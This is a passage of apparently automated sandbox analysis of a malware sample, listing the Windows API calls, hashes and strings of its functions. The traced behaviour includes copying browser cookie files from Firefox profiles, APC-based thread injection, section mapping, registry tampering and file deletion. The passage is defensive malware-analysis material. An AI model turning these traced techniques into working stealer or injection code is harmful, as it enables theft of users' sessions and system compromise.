    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
